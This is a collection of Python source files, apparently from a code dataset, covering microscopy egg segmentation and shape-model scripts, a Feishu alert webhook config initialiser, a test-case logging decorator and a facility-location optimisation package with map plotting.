        # some morphological operations for cleaning
seg_lb = morphology.binary_closing(seg_lb, selem=morphology.disk(5))
seg_lb = ndimage.morphology.binary_fill_holes(seg_lb)
# thr_area = int(0.15 * np.sum(seg_lb))
# seg_lb = morphology.remove_small_holes(seg_lb, min_size=thr_area)
seg_lb = morphology.binary_opening(seg_lb, selem=morphology.disk(15))
segm_clean[seg_lb] = lb
return segm_clean, centers, None
def create_circle_center(img_shape, centers, radius=10):
""" create initialisation from centres as small circles
:param img_shape:
:param [[int, int]] centers:
:param int radius:
:return:
"""
mask_circle = np.zeros(img_shape, dtype=int)
mask_perimeter = np.zeros(img_shape, dtype=int)
center_circles = list()
for i, pos in enumerate(centers):
rr, cc = draw.circle(int(pos[0]), int(pos[1]), radius,
shape=img_shape[:2])
mask_circle[rr, cc] = i + 1
rr, cc = draw.circle_perimeter(int(pos[0]), int(pos[1]), radius,
shape=img_shape[:2])
mask_perimeter[rr, cc] = i + 1
center_circles.append(np.array([rr, cc]).transpose())
return center_circles, mask_circle, mask_perimeter
def segment_active_contour(img, centers):
""" segmentation using acive contours
:param ndarray img: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
logging.debug('segment: active_contour...')
# http://scikit-image.org/docs/dev/auto_examples/edges/plot_active_contours.html
segm = np.zeros(img.shape[:2])
img_smooth = ndimage.filters.gaussian_filter(img, 5)
center_circles, _, _ = create_circle_center(img.shape[:2], centers)
for i, snake in enumerate(center_circles):
snake = segmentation.active_contour(img_smooth, snake.astype(float),
alpha=0.015, beta=10, gamma=0.001,
w_line=0.0, w_edge=1.0,
max_px_move=1.0,
max_iterations=2500,
convergence=0.2)
seg = np.zeros(segm.shape, dtype=bool)
x, y = np.array(snake).transpose().tolist()
# rr, cc = draw.polygon(x, y)
        # NOTE: map() returns an iterator in Python 3, so cast to int arrays for indexing
        seg[np.array(x, dtype=int), np.array(y, dtype=int)] = True
seg = morphology.binary_dilation(seg, selem=morphology.disk(3))
bb_area = int((max(x) - min(x)) * (max(y) - min(y)))
logging.debug('bounding box area: %d', bb_area)
seg = morphology.remove_small_holes(seg, min_size=bb_area)
segm[seg] = i + 1
return segm, centers, None
def segment_morphsnakes(img, centers, init_center=True, smoothing=5,
lambdas=(3, 3), bb_dist=INIT_MASK_BORDER):
""" segmentation using morphological snakes with some parameters
:param ndarray img: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param bool init_center:
:param int smoothing:
:param [int, int] lambdas:
:param float bb_dist:
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
logging.debug('segment: morph-snakes...')
if img.ndim == 3:
img = img[:, :, 0]
if init_center:
_, mask, _ = create_circle_center(img.shape[:2], centers, radius=15)
else:
mask = np.zeros_like(img, dtype=int)
        # cast to int: INIT_MASK_BORDER is a float and slice indices must be integers
        bb_dist = int(bb_dist)
        mask[bb_dist:-bb_dist, bb_dist:-bb_dist] = 1
# Morphological ACWE. Initialization of the level-set.
params = dict(smoothing=smoothing, lambda1=lambdas[0], lambda2=lambdas[1])
ms = multi_snakes.MultiMorphSnakes(img, mask, morphsnakes.MorphACWE, params)
diag = np.sqrt(img.shape[0] ** 2 + img.shape[1] ** 2)
ms.run(int(diag / 2.))
segm = ms.levelset
return segm, centers, None
# def segment_chanvese(img, centers, init_center=False, bb_dist=INIT_MASK_BORDER):
# logging.debug('segment: chanvese...')
# if img.ndim == 3:
# img = img[:, :, 0]
# if init_center:
# _, mask, _ = create_circle_center(img.shape[:2], centers, radius=20)
# init_mask = (mask > 0).astype(int)
# else:
# init_mask = np.zeros_like(img, dtype=int)
# init_mask[bb_dist:-bb_dist, bb_dist:-bb_dist] = 1
# nb_iter = int(sum(img.shape))
# segm, phi, its = chanvese.chanvese(img, init_mask, alpha=0.2,
# max_its=nb_iter, thresh=0)
# segm = measure.label(segm)
# return segm, centers, None
def segment_fit_ellipse(seg, centers, fn_preproc_points,
thr_overlap=SEGM_OVERLAP):
""" segment eggs using ellipse fitting
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param fn_preproc_points: function for detection boundary points
:param float thr_overlap: threshold for removing overlapping segmentation
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
points_centers = fn_preproc_points(seg, centers)
centres_new, ell_params = [], []
segm = np.zeros_like(seg)
for i, points in enumerate(points_centers):
lb = i + 1
ellipse = EllipseModel()
        # EllipseModel.estimate() returns False when the fit fails
        if not ellipse.estimate(points):
            continue
logging.debug('ellipse params: %r', ellipse.params)
segm = ell_fit.add_overlap_ellipse(segm, ellipse.params, lb, thr_overlap)
if np.any(segm == lb):
centres_new.append(centers[i])
ell_params.append(ellipse.params)
dict_export = {'ellipses.csv': pd.DataFrame(ell_params, columns=COLUMNS_ELLIPSE)}
return segm, np.array(centres_new), dict_export
def segment_fit_ellipse_ransac(seg, centers, fn_preproc_points, nb_inliers=0.6,
thr_overlap=SEGM_OVERLAP):
""" segment eggs using ellipse fitting and RANDSAC strategy
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param fn_preproc_points: function for detection boundary points
:param float nb_inliers: ratio of inliers for RANSAC
:param float thr_overlap: threshold for removing overlapping segmentations
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
points_centers = fn_preproc_points(seg, centers)
centres_new, ell_params = [], []
segm = np.zeros_like(seg)
for i, points in enumerate(points_centers):
lb = i + 1
nb_min = int(len(points) * nb_inliers)
ransac_model, _ = measure.ransac(points, EllipseModel,
min_samples=nb_min,
residual_threshold=15,
max_trials=250)
if not ransac_model:
continue
logging.debug('ellipse params: %r', ransac_model.params)
segm = ell_fit.add_overlap_ellipse(segm, ransac_model.params, lb,
thr_overlap)
if np.any(segm == lb):
centres_new.append(centers[i])
ell_params.append(ransac_model.params)
dict_export = {'ellipses.csv': pd.DataFrame(ell_params, columns=COLUMNS_ELLIPSE)}
return segm, np.array(centres_new), dict_export
def segment_fit_ellipse_ransac_segm(seg, centers, fn_preproc_points,
table_p, nb_inliers=0.35,
thr_overlap=SEGM_OVERLAP):
""" segment eggs using ellipse fitting and RANDSAC strategy on segmentation
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
    :param fn_preproc_points: function for detecting boundary points
:param [[float]] table_p: table of probabilities being foreground / background
:param float nb_inliers: ratio of inliers for RANSAC
:param float thr_overlap: threshold for removing overlapping segmentations
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
slic, points_all, labels = ell_fit.get_slic_points_labels(seg, slic_size=15,
slic_regul=0.1)
points_centers = fn_preproc_points(seg, centers)
weights = np.bincount(slic.ravel())
centres_new, ell_params = [], []
segm = np.zeros_like(seg)
for i, points in enumerate(points_centers):
lb = i + 1
ransac_model, _ = ell_fit.ransac_segm(points,
ell_fit.EllipseModelSegm,
points_all, weights,
labels, table_p,
min_samples=nb_inliers,
residual_threshold=25,
max_trials=250)
if not ransac_model:
continue
logging.debug('ellipse params: %r', ransac_model.params)
segm = ell_fit.add_overlap_ellipse(segm, ransac_model.params, lb,
thr_overlap)
if np.any(segm == lb):
centres_new.append(centers[i])
ell_params.append(ransac_model.params)
dict_export = {'ellipses.csv': pd.DataFrame(ell_params, columns=COLUMNS_ELLIPSE)}
return segm, np.array(centres_new), dict_export
def segment_graphcut_pixels(seg, centers, labels_fg_prob, gc_regul=1.,
seed_size=10, coef_shape=0.,
shape_mean_std=(50., 10.)):
""" wrapper for segment global GraphCut optimisations
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param labels_fg_prob:
:param float gc_regul:
:param int seed_size:
:param float coef_shape:
:param (float, float) shape_mean_std:
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
segm_obj = seg_rg.object_segmentation_graphcut_pixels(
seg, centers, labels_fg_prob, gc_regul, seed_size, coef_shape,
shape_mean_std=shape_mean_std)
return segm_obj, centers, None
def segment_graphcut_slic(slic, seg, centers, labels_fg_prob, gc_regul=1.,
multi_seed=True, coef_shape=0., edge_weight=1.,
shape_mean_std=(50., 10.)):
""" wrapper for segment global GraphCut optimisations on superpixels
:param ndarray slic:
:param ndarray seg: input image / segmentation
:param [[int, int]] centers: position of centres / seeds
:param labels_fg_prob:
:param float gc_regul:
:param bool multi_seed:
:param float coef_shape:
:param float edge_weight:
:param shape_mean_std:
:return (ndarray, [[int, int]]): resulting segmentation, updated centres
"""
gc_labels = seg_rg.object_segmentation_graphcut_slic(
slic, seg, centers, labels_fg_prob, gc_regul, edge_weight,
add_neighbours=multi_seed, coef_shape=coef_shape,
shape_mean_std=shape_mean_std)
segm_obj = np.array(gc_labels)[slic]
return segm_obj, centers, None
def segment_rg2sp_greedy(slic, seg, centers, labels_fg_prob, path_model,
coef_shape, coef_pairwise=5, allow_obj_swap=True,
prob_label_trans=(0.1, 0.03),
dict_thresholds=RG2SP_THRESHOLDS, debug_export=''):
""" wrapper for region growing method with some debug exporting """
if os.path.splitext(path_model)[-1] == '.npz':
shape_model = np.load(path_model)
else:
shape_model = pickle.load(open(path_model, 'rb'))
dict_debug = dict() if os.path.isdir(debug_export) else None
slic_prob_fg = seg_rg.compute_segm_prob_fg(slic, seg, labels_fg_prob)
labels_greedy = seg_rg.region_growing_shape_slic_greedy(
slic, slic_prob_fg, centers, (shape_model['mix_model'], shape_model['cdfs']),
shape_model['name'], coef_shape=coef_shape, coef_pairwise=coef_pairwise,
prob_label_trans=prob_label_trans, greedy_tol=1e-1, allow_obj_swap=allow_obj_swap,
dict_thresholds=dict_thresholds, nb_iter=1000, debug_history=dict_debug)
if dict_debug is not None:
nb_iter = len(dict_debug['energy'])
for i in range(nb_iter):
fig = tl_visu.figure_rg2sp_debug_complete(seg, slic, dict_debug, i)
fig.savefig(os.path.join(debug_export, 'iter_%03d' % i))
plt.close(fig)
segm_obj = labels_greedy[slic]
return segm_obj, centers, None
def segment_rg2sp_graphcut(slic, seg, centers, labels_fg_prob, path_model,
coef_shape, coef_pairwise=5, allow_obj_swap=True,
prob_label_trans=(0.1, 0.03),
dict_thresholds=RG2SP_THRESHOLDS, debug_export=''):
""" wrapper for region growing method with some debug exporting """
if os.path.splitext(path_model)[-1] == '.npz':
shape_model = np.load(path_model)
else:
shape_model = pickle.load(open(path_model, 'rb'))
dict_debug = dict() if os.path.isdir(debug_export) else None
slic_prob_fg = seg_rg.compute_segm_prob_fg(slic, seg, labels_fg_prob)
labels_gc = seg_rg.region_growing_shape_slic_graphcut(
slic, slic_prob_fg, centers, (shape_model['mix_model'], shape_model['cdfs']),
shape_model['name'], coef_shape=coef_shape, coef_pairwise=coef_pairwise,
prob_label_trans=prob_label_trans, optim_global=True, allow_obj_swap=allow_obj_swap,
dict_thresholds=dict_thresholds, nb_iter=250, debug_history=dict_debug)
if dict_debug is not None:
nb_iter = len(dict_debug['energy'])
for i in range(nb_iter):
fig = tl_visu.figure_rg2sp_debug_complete(seg, slic, dict_debug, i)
fig.savefig(os.path.join(debug_export, 'iter_%03d' % i))
plt.close(fig)
segm_obj = labels_gc[slic]
return segm_obj, centers, None
def simplify_segm_3cls(seg, lut=(0., 0.8, 1.), smooth=True):
""" simple segmentation into 3 classes
:param ndarray seg: input image / segmentation
    :param [float] lut: lookup table mapping the three classes to output values
    :param bool smooth: whether to blur the result with a Gaussian filter
:return ndarray:
"""
segm = seg.copy()
segm[seg > 1] = 2
if np.sum(seg > 0) > 0:
seg_filled = ndimage.morphology.binary_fill_holes(seg > 0)
segm[np.logical_and(seg == 0, seg_filled)] = 2
segm = np.array(lut)[segm]
if smooth:
segm = ndimage.filters.gaussian_filter(segm, 5)
return segm
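# With the default LUT, background stays at 0.0, the first label maps to 0.8,
# and any label above 1 (or background enclosed by foreground) is pushed to 1.0;
# the optional Gaussian blur (sigma=5) yields the smooth image used by the
# 'morph-snakes_seg' method below.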
def create_dict_segmentation(params, slic, segm, img, centers):
""" create dictionary of segmentation function hash, function and parameters
:param dict params:
:param ndarray slic:
:param ndarray segm:
:param [[float]] centers:
:return {str: (function, (...))}:
"""
# parameters for Region Growing
params_rg_single = (slic, segm, centers, params['tab-proba_RG2SP'],
params['path_single-model'], params['RG2SP-shape'],
params['RG2SP-pairwise'], params['RG2SP-swap'],
params['label_trans'], params['RG2SP_theshold'])
params_rg_multi = (slic, segm, centers, params['tab-proba_RG2SP'],
params['path_multi-models'], params['RG2SP-shape'],
params['RG2SP-pairwise'], params['RG2SP-swap'],
params['label_trans'], params['RG2SP_theshold'])
tab_proba_gc = params['tab-proba_graphcut']
gc_regul_px = params['gc-pixel_regul']
gc_regul_slic = params['gc-slic_regul']
seg_simple = simplify_segm_3cls(segm) if segm is not None else None
dict_segment = {
'ellipse_moments': (segment_fit_ellipse,
(segm, centers,
ell_fit.prepare_boundary_points_ray_dist)),
'ellipse_ransac_mmt': (segment_fit_ellipse_ransac,
(segm, centers,
ell_fit.prepare_boundary_points_ray_dist)),
'ellipse_ransac_crit': (segment_fit_ellipse_ransac_segm,
(segm, centers,
ell_fit.prepare_boundary_points_ray_edge,
params['tab-proba_ellipse'])),
'ellipse_ransac_crit2': (segment_fit_ellipse_ransac_segm,
(segm, centers,
ell_fit.prepare_boundary_points_ray_join,
params['tab-proba_ellipse'])),
'ellipse_ransac_crit3': (segment_fit_ellipse_ransac_segm,
(segm, centers,
ell_fit.prepare_boundary_points_ray_mean,
params['tab-proba_ellipse'])),
'GC_pixels-small': (segment_graphcut_pixels,
(segm, centers, tab_proba_gc, gc_regul_px, 10)),
'GC_pixels-large': (segment_graphcut_pixels,
(segm, centers, tab_proba_gc, gc_regul_px, 30)),
'GC_pixels-shape': (segment_graphcut_pixels, (segm, centers,
tab_proba_gc, gc_regul_px, 10, 0.1)),
'GC_slic-small': (segment_graphcut_slic, (slic, segm, centers,
tab_proba_gc, gc_regul_slic, False)),
'GC_slic-large': (segment_graphcut_slic, (slic, segm, centers,
tab_proba_gc, gc_regul_slic, True)),
'GC_slic-shape': (segment_graphcut_slic,
(slic, segm, centers, tab_proba_gc, 1., False, 0.1)),
'RG2SP_greedy-single': (segment_rg2sp_greedy, params_rg_single),
'RG2SP_greedy-mixture': (segment_rg2sp_greedy, params_rg_multi),
'RG2SP_GC-single': (segment_rg2sp_graphcut, params_rg_single),
'RG2SP_GC-mixture': (segment_rg2sp_graphcut, params_rg_multi),
'watershed': (segment_watershed, (segm, centers)),
'watershed_morph': (segment_watershed, (segm, centers, True)),
        # NOTE, this method takes too long to run in CI
'morph-snakes_seg': (segment_morphsnakes,
(seg_simple, centers, True, 3, [2, 1])),
'morph-snakes_img': (segment_morphsnakes, (img, centers)),
}
if params['methods'] is not None:
params['methods'] = [n.lower() for n in params['methods']]
dict_segment_filter = {n: dict_segment[n] for n in dict_segment
if n.lower() in params['methods']}
else:
dict_segment_filter = dict_segment
return dict_segment_filter
def image_segmentation(idx_row, params, debug_export=DEBUG_EXPORT):
""" image segmentation which prepare inputs (imsegm, centres)
and perform segmentation of various imsegm methods
:param (int, str) idx_row: input image and centres
:param dict params: segmentation parameters
:return str: image name
"""
_, row_path = idx_row
for k in dict(row_path):
if isinstance(k, str) and k.startswith('path_'):
row_path[k] = tl_data.update_path(row_path[k], absolute=True)
logging.debug('segmenting image: "%s"', row_path['path_image'])
name = os.path.splitext(os.path.basename(row_path['path_image']))[0]
img = load_image(row_path['path_image'])
# make the image like RGB
img_rgb = np.rollaxis(np.tile(img, (3, 1, 1)), 0, 3)
seg = load_image(row_path['path_segm'], 'segm')
assert img_rgb.shape[:2] == seg.shape, \
'image %r and segm %r do not match' % (img_rgb.shape[:2], seg.shape)
if not os.path.isfile(row_path['path_centers']):
logging.warning('no center was detected for "%s"', name)
return name
centers = tl_data.load_landmarks_csv(row_path['path_centers'])
centers = tl_data.swap_coord_x_y(centers)
if not list(centers):
logging.warning('no center was detected for "%s"', name)
return name
# img = seg / float(seg.max())
slic = seg_spx.segment_slic_img2d(img_rgb, sp_size=params['slic_size'],
relative_compact=params['slic_regul'])
path_segm = os.path.join(params['path_exp'], 'input', name + '.png')
export_draw_image_segm(path_segm, img_rgb, segm_obj=seg, centers=centers)
seg_simple = simplify_segm_3cls(seg)
path_segm = os.path.join(params['path_exp'], 'simple', name + '.png')
export_draw_image_segm(path_segm, seg_simple - 1.)
dict_segment = create_dict_segmentation(params, slic, seg, img, centers)
image_name = name + '.png'
centre_name = name + '.csv'
# iterate over segmentation methods and perform segmentation on this image
for method in dict_segment:
(fn, args) = dict_segment[method]
logging.debug(' -> %s on "%s"', method, name)
path_dir = os.path.join(params['path_exp'], method) # n.split('_')[0]
path_segm = os.path.join(path_dir, image_name)
path_centre = os.path.join(path_dir + DIR_CENTRE_POSIX, centre_name)
path_fig = os.path.join(path_dir + DIR_VISUAL_POSIX, image_name)
path_debug = os.path.join(path_dir + DIR_DEBUG_POSIX, name)
# assuming that segmentation may fail
try:
t = time.time()
if debug_export and 'rg2sp' in method:
os.mkdir(path_debug)
segm_obj, centers, dict_export = fn(*args,
debug_export=path_debug)
else:
segm_obj, centers, dict_export = fn(*args)
# also export ellipse params here or inside the segm fn
if dict_export is not None:
for k in dict_export:
export_partial(k, dict_export[k], path_dir, name)
logging.info('running time of %r on image "%s" is %d s',
fn.__name__, image_name, time.time() - t)
tl_data.io_imsave(path_segm, segm_obj.astype(np.uint8))
export_draw_image_segm(path_fig, img_rgb, seg, segm_obj, centers)
# export also centers
centers = tl_data.swap_coord_x_y(centers)
tl_data.save_landmarks_csv(path_centre, centers)
except Exception:
logging.exception('segment fail for "%s" via %s', name, method)
return name
def export_partial(str_key, obj_content, path_dir, name):
key, ext = os.path.splitext(str_key)
path_out = os.path.join(path_dir + '___%s' % key)
if not os.path.isdir(path_out):
os.mkdir(path_out)
path_file = os.path.join(path_out, name + ext)
if ext.endswith('.csv'):
obj_content.to_csv(path_file)
return path_file
def main(params, debug_export=DEBUG_EXPORT):
""" the main entry point
:param dict params: segmentation parameters
    :param bool debug_export: whether to export visualisations
"""
logging.getLogger().setLevel(logging.DEBUG)
params = tl_expt.create_experiment_folder(params, dir_name=NAME_EXPERIMENT,
stamp_unique=EACH_UNIQUE_EXPERIMENT)
tl_expt.set_experiment_logger(params['path_exp'])
logging.info(tl_expt.string_dict(params, desc='PARAMETERS'))
# tl_expt.create_subfolders(params['path_exp'], [FOLDER_IMAGE])
df_paths = pd.read_csv(params['path_list'], index_col=0)
logging.info('loaded %i items with columns: %r', len(df_paths),
df_paths.columns.tolist())
df_paths.dropna(how='any', inplace=True)
# create sub-folders if required
tl_expt.create_subfolders(params['path_exp'], ['input', 'simple'])
dict_segment = create_dict_segmentation(params, None, None, None, None)
dirs_center = [n + DIR_CENTRE_POSIX for n in dict_segment]
dirs_visu = [n + DIR_VISUAL_POSIX for n in dict_segment]
tl_expt.create_subfolders(params['path_exp'],
[n for n in dict_segment] + dirs_center + dirs_visu)
if debug_export:
list_dirs = [n + DIR_DEBUG_POSIX for n in dict_segment if 'rg2sp' in n]
tl_expt.create_subfolders(params['path_exp'], list_dirs)
_wrapper_segment = partial(image_segmentation, params=params)
iterate = tl_expt.WrapExecuteSequence(_wrapper_segment, df_paths.iterrows(),
nb_workers=params['nb_workers'])
list(iterate)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
logging.info('running...')
params = arg_parse_params(SEGM_PARAMS)
main(params)
logging.info('DONE')
```
#### File: pyImSegm/experiments_ovary_detect/run_RG2Sp_estim_shape-models.py
```python
import os
import sys
import glob
import logging
import pickle
import argparse
import numpy as np
import pandas as pd
sys.path += [os.path.abspath('.'), os.path.abspath('..')] # Add path to root
import imsegm.utilities.data_io as tl_data
import imsegm.region_growing as tl_rg
PATH_DATA = tl_data.update_path('data_images', absolute=True)
PATH_IMAGES = os.path.join(tl_data.update_path('data_images'), 'drosophila_ovary_slice')
PATH_ANNOT = os.path.join(PATH_IMAGES, 'annot_eggs', '*.png')
RAY_STEP = 10
# names of default files for models
NAME_CSV_RAY_ALL = 'eggs_ray-shapes.csv'
NAME_PKL_MODEL_SINGLE = 'RG2SP_eggs_single-model.pkl'
NAME_PKL_MODEL_MIXTURE = 'RG2SP_eggs_mixture-model.pkl'
NAME_NPZ_MODEL_SINGLE = 'RG2SP_eggs_single-model.npz'
NAME_NPZ_MODEL_MIXTURE = 'RG2SP_eggs_mixture-model.npz'
def arg_parse_params():
"""
SEE: https://docs.python.org/3/library/argparse.html
:return {str: str}:
"""
parser = argparse.ArgumentParser()
parser.add_argument('-annot', '--path_annot', type=str, required=False,
help='path to directory & name pattern for annotations',
default=PATH_ANNOT)
parser.add_argument('-out', '--path_out', type=str, required=False,
help='path to the output directory', default=PATH_DATA)
parser.add_argument('-nb', '--nb_comp', type=int, required=False,
help='number of component in Mixture model', default=2)
params = vars(parser.parse_args())
for k in (k for k in params if 'path' in k):
params[k] = tl_data.update_path(params[k], absolute=True)
p = os.path.dirname(params[k]) if k == 'path_annot' else params[k]
assert os.path.exists(p), 'missing: %s' % p
# load saved configuration
logging.info('ARG PARAMETERS: \n %r', params)
return params
def main(path_annot, path_out, nb_comp=5):
list_paths = sorted(glob.glob(path_annot))
logging.info('nb images: %i SAMPLES: %r', len(list_paths),
[os.path.basename(p) for p in list_paths[:5]])
list_segms = []
for path_seg in list_paths:
seg = tl_data.io_imread(path_seg)
list_segms.append(seg)
list_rays, _ = tl_rg.compute_object_shapes(list_segms, ray_step=RAY_STEP,
interp_order='spline',
smooth_coef=1)
logging.info('nb eggs: %i, nb rays: %i', len(list_rays), len(list_rays[0]))
x_axis = np.linspace(0, 360, len(list_rays[0]), endpoint=False)
df = pd.DataFrame(np.array(list_rays), columns=x_axis.astype(int))
path_csv = os.path.join(path_out, NAME_CSV_RAY_ALL)
logging.info('exporting all Rays: %s', path_csv)
df.to_csv(path_csv)
# SINGLE MODEL
model, list_cdf = tl_rg.transform_rays_model_cdf_mixture(list_rays, 1)
    cdf = np.array(list_cdf)
# path_model = os.path.join(path_out, NAME_NPZ_MODEL_SINGLE)
# logging.info('exporting model: %s', path_model)
# np.savez(path_model, name='cdf', cdfs=cdf, mix_model=model)
path_model = os.path.join(path_out, NAME_PKL_MODEL_SINGLE)
logging.info('exporting model: %s', path_model)
with open(path_model, 'wb') as fp:
pickle.dump({'name': 'cdf',
'cdfs': cdf,
'mix_model': model}, fp)
# MIXTURE MODEL
model, list_mean_cdf = tl_rg.transform_rays_model_sets_mean_cdf_mixture(
list_rays, nb_comp)
# path_model = os.path.join(path_out, NAME_NPZ_MODEL_MIXTURE)
# logging.info('exporting model: %s', path_model)
# np.savez(path_model, name='set_cdfs', cdfs=list_mean_cdf,
# mix_model=model)
path_model = os.path.join(path_out, NAME_PKL_MODEL_MIXTURE)
logging.info('exporting model: %s', path_model)
with open(path_model, 'wb') as fp:
pickle.dump({'name': 'set_cdfs',
'cdfs': list_mean_cdf,
'mix_model': model}, fp)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
logging.info('running...')
params = arg_parse_params()
main(params['path_annot'], params['path_out'], params['nb_comp'])
logging.info('Done')
``` |
{
"source": "jiuzhou-zhao/dockers",
"score": 2
} |
#### File: dockers/scripts/init_prometheus_alert_manager_webhook_feishu.py
```python
import os
def pre_init(data_root, image, docker_vars):
with open(os.path.join(data_root, 'config.yml'), 'w') as file_writer:
file_writer.write('''
bots:
webhook: # webhook 是 group name
url: ''' + docker_vars['FEISHU_WEBHOOK'] + '''
metadata:
"链接地址": "https://www.baidu.com"
''')
def post_init(data_root, image, docker_vars):
pass
``` |
{
"source": "JivanAmara/test_utils",
"score": 3
} |
#### File: test_utils/regression_test_utils/regression_test_utils.py
```python
import jsonpickle, logging
# PythonDecorators/my_decorator.py
class log_test_case(object):
""" @brief: Decorator to log input & output of a method as a jsonpickle'd tuple for easy
test creation.
Format of the tuple is (<method name>, <args (without self)>, <kwargs>, <result>)
@author: Jivan
@since: 2015-07-29
@change: 2015-08-03 by Jivan: Added class_name to initialization & logged output.
"""
def __init__(self, logger, class_name):
self.logger = logger
self.class_name = class_name
def __call__(self, f):
method_name = f.__name__
logger = self.logger
def wrapped_f(*args, **kwargs):
result = f(*args, **kwargs)
if logger.getEffectiveLevel() <= logging.DEBUG:
args_wo_instance = args[1:]
tc = repr(jsonpickle.encode(
(method_name, args_wo_instance, kwargs, result), keys=True
)
)
logger.debug('Decorator TestCase for "{}.{}":\n\t{}'\
.format(self.class_name, method_name, tc))
return result
return wrapped_f
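# A minimal usage sketch (hypothetical class and logger names): with DEBUG
# logging enabled, calling Calculator().add(1, 2) would log the jsonpickle'd
# tuple ('add', (1, 2), {}, 3), ready to paste into a regression test.
#
#   logger = logging.getLogger(__name__)
#
#   class Calculator(object):
#       @log_test_case(logger, 'Calculator')
#       def add(self, a, b):
#           return a + b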
``` |
{
"source": "jivanhoe/flop",
"score": 3
} |
#### File: flop/model/base.py
```python
from __future__ import annotations
from dataclasses import dataclass
from typing import List, Optional, Tuple
import numpy as np
import pandas as pd
from haversine import haversine
from mip import OptimizationStatus, ProgressLog
@dataclass
class Location:
lat: float
lon: float
def __post_init__(self):
if abs(self.lat) > 90:
raise ValueError
if not (180 >= self.lon >= 0):
raise ValueError
def to_tuple(self) -> Tuple[float, float]:
return self.lat, self.lon
def distance(self, other: Location) -> float:
return haversine(point1=self.to_tuple(), point2=other.to_tuple())
@dataclass
class FacilityCandidate:
name: str
location: Location
cost_variable: float
cost_fixed: float
capacity_max: float
capacity_min: float = 0.
def __post_init__(self):
if self.cost_variable < 0:
raise ValueError
if self.cost_fixed < 0:
raise ValueError
if not (self.capacity_max >= self.capacity_min >= 0):
raise ValueError
def __hash__(self):
return self.name
@dataclass
class DemandCentre:
name: str
location: Location
demand_variable: Optional[np.ndarray] = None
demand_fixed: float = 0.
def __post_init__(self):
if self.demand_variable is not None:
if not (1 <= len(self.demand_variable.shape) <= 2):
raise ValueError
if self.demand_variable.min() < 0:
raise ValueError
if self.n_periods <= 1:
raise ValueError
if self.demand_fixed is not None:
if self.demand_fixed < 0:
raise ValueError
else:
if self.demand_fixed is None:
raise ValueError
if self.demand_fixed < 0:
raise ValueError
@property
def demand(self) -> np.ndarray:
return (
(np.array([self.demand_fixed]) if self.demand_fixed is not None else 0)
+ (self.demand_variable if self.demand_variable is not None else 0)
)
@property
def n_periods(self) -> int:
if self.demand_variable is not None:
return self.demand_variable.shape[0]
return 1
@property
def n_samples(self) -> int:
if self.demand_variable is not None:
return self.demand_variable.shape[1]
return 0
def __hash__(self):
return self.name
@dataclass
class Problem:
facility_candidates: List[FacilityCandidate]
demand_centers: List[DemandCentre]
cost_transport: float
cost_unmet_demand: Optional[float] = None
discount_factor: float = 1.
def __post_init__(self):
if (
len(set(facility_candidate.name for facility_candidate in self.facility_candidates))
!= len(self.facility_candidates)
):
raise ValueError
if (
len(set(demand_center.name for demand_center in self.demand_centers))
!= len(self.demand_centers)
):
raise ValueError
if len(set(
demand_center.n_periods for demand_center in self.demand_centers
if demand_center.demand_variable is not None
)) != 1:
raise ValueError
if self.cost_transport < 0:
raise ValueError
if self.cost_unmet_demand is not None:
if self.cost_unmet_demand <= 0:
raise ValueError
if not(1 >= self.discount_factor >= 0):
raise ValueError
def compute_distances(self) -> np.ndarray:
distances = np.full(shape=(len(self.facility_candidates), len(self.demand_centers)), fill_value=np.nan)
for i, facility_candidate in enumerate(self.facility_candidates):
for j, demand_center in enumerate(self.demand_centers):
distances[i, j] = facility_candidate.location.distance(other=demand_center.location)
return distances
@property
def n_periods(self) -> int:
for demand_center in self.demand_centers:
if demand_center.demand_variable is not None:
return demand_center.n_periods
return 1
@dataclass
class SolveInfo:
status: OptimizationStatus
progress_log: ProgressLog
gap: float
def __post_init__(self):
if self.gap < 0:
raise ValueError
@dataclass
class Result:
facilities: pd.DataFrame
schedule: pd.DataFrame
unmet_demand: pd.DataFrame
solve_info: SolveInfo
def __post_init__(self):
pass
```
#### File: flop/utils/plotting.py
```python
import folium
import numpy as np
from flop.model.base import Problem, Result, Location
from typing import Optional
def get_map_centre(data: Problem) -> Location:
return Location(
lat=np.mean(
[facility_candidate.location.lat for facility_candidate in data.facility_candidates]
+ [demand_center.location.lat for demand_center in data.demand_centers]
),
lon=np.mean(
[facility_candidate.location.lon for facility_candidate in data.facility_candidates]
+ [demand_center.location.lon for demand_center in data.demand_centers]
)
)
def make_map(data: Problem) -> folium.Map:
return folium.Map(location=get_map_centre(data=data).to_tuple(), zoom_start=7)
def add_demand_centres_to_map(m: folium.Map, data: Problem, solution: Optional[Result] = None) -> None:
for demand_center in data.demand_centers:
popup_text = (
f"Name: {demand_center.name}<br>"
f"Average demand: {round(demand_center.demand.mean())}"
)
if solution is not None and data.cost_unmet_demand is not None:
info = solution.unmet_demand.loc[demand_center.name]
popup_text += f"<br>Average unmet demand: {round(info['unmet_demand'].mean())}"
folium.Marker(
location=demand_center.location.to_tuple(),
popup=folium.Popup(popup_text, max_width=1000),
icon=folium.Icon(color="orange", icon="building", prefix="fa"),
).add_to(m)
def add_facilities_to_map(
m: folium.Map,
data: Problem,
solution: Optional[Result] = None,
show_unused_facilities: bool = True
) -> None:
for facility in data.facility_candidates:
popup_text = f"Name: {facility.name}<br>"
if solution is not None:
info = solution.facilities.loc[facility.name]
if info["used"]:
color = "green"
popup_text += (
f"Capacity: {round(info['capacity'])}<br>"
f"Status: USED<br>"
f"Cost: {round(info['capex_per_period'])}"
)
else:
if not show_unused_facilities:
continue
color = "gray"
popup_text += f"Status: UNUSED"
else:
color = "blue"
popup_text += (
f"Capacity range: {round(facility.capacity_min)}-{round(facility.capacity_max)}<br>"
f"Fixed cost: {round(facility.cost_fixed)}<br>"
f"Variable cost: {round(facility.cost_variable)}"
)
folium.Marker(
location=facility.location.to_tuple(),
